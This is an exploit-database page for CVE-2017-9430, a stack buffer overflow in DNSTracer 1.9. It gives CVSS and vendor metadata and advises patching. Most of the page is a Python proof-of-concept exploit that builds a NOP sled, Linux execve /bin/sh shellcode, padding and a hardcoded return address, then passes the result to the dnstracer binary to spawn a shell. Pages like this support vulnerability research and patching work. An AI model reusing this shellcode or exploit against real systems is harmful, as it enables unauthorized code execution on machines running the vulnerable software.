header-logo
Suggest Exploit
vendor:
DNSTracer
by:
j0lama
9,8
CVSS
CRITICAL
Buffer Overflow
120
CWE
Product Name: DNSTracer
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: YES
Related CWE: CVE-2017-9430
CPE: a:mavetju:dnstracer:1.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 12.04
2017

DNSTracer 1.9 – Buffer Overflow

DNSTracer 1.9 is vulnerable to a stack-based buffer overflow vulnerability. This vulnerability is caused by a lack of proper boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input that contains malicious code, which will be executed in the context of the application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of DNSTracer.
Source

Exploit-DB raw data:

# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php


# Proof of Concept
import os
from subprocess import call

def run():
    try:
        print "\nDNSTracer Stack-based Buffer Overflow"
        print "Author: j0lama"
        print "Tested with Dnstracer compile without buffer overflow protection"

        nops = "\x90"*1006
        shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        filling = "A"*24
        eip = "\x2f\xeb\xff\xbf"

        #buf size = 1057
        buf = nops + shellcode + filling + eip

        call(["./dnstracer", buf])

    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "\nDnstracer not found!\n"
        else:
            print "\nError executing exploit\n"
        raise


if __name__ == '__main__':
    try:
        run()
    except Exception as e:
        print "Something went wrong"

Navigation

Suggest Exploit

Services By CQR